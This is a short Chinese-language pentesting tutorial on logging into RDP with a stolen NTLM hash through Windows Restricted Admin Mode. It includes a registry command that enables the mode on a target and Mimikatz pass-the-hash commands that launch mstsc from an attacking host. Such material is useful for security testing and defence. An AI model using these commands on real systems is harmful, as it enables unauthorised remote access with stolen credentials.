利用哈希传递登录 RDP 远程桌面

简介

Windows Server 2012 R2 采用了新版的 RDP 远程桌面协议，在这个新版协议中有一个 ”受限管理员” （Restricted Admin）的特性。相信渗透测试人员和系统管理员都会对这个特性有足够的兴趣，因为通过这个特性，我们可以实现哈希传递攻击并成功登录远程桌面。
在抓取到的 Hash 无法破解的情况下，如果目标主机开启了 “Restricted Admin Mode” 也行，那么我们便可以使用 Hash 来直接实现 RDP 远程登录。Restricted Admin Mode 在 Windows 8.1 和 Windows Server 2012 R2 上默认开启。

利用

1、客户端、服务器都需要开启Restricted Admin Mode。
2、win 2012实测可用。
通过修改注册表的方式开启目标主机的 Restricted Admin Mode，值为 0 代表开启，值为 1 代表关闭：
REG ADD “HKLM\System\CurrentControlSet\Control\Lsa” /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f #开启Restricted Admin Mode，需要管理员权限。 REG query “HKLM\System\CurrentControlSet\Control\Lsa” | findstr “DisableRestrictedAdmin” # 查看是否成功开启

如上图所示，成功在目标主机开启了 Restricted Admin Mode。
然后再攻击机上使用 Mimikatz 进行哈希传递，大致原理就是哈希传递成功后执行mstsc.exe /restrictedadmin来打开：
privilege::debug #管理员运行。 sekurlsa::pth /user:administrator /domain:xxx.com /ntlm:xxx “/run:mstsc.exe /restrictedadmin”